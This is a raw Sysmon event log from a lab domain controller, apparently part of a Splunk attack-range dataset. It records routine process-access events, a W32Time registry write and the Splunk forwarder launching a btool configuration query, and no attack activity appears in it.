13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6700-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8555-5FCF-6600-000000009101}33643860C:\Windows\system32\cmd.exe{10ACEC4A-8555-5FCF-6700-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.355{10ACEC4A-8555-5FCF-6700-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-8555-5FCF-6600-000000009101}3364C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6600-000000009101}3364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.352{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6600-000000009101}3364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.336{10ACEC4A-8553-5FCF-5700-000000009101}40764072C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8555-5FCF-6600-000000009101}3364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.350{10ACEC4A-8555-5FCF-6600-000000009101}3364C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.320{10ACEC4A-8555-5FCF-6500-000000009101}28521520C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:25.118{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6cd69-0x7fab290b) 10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6500-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 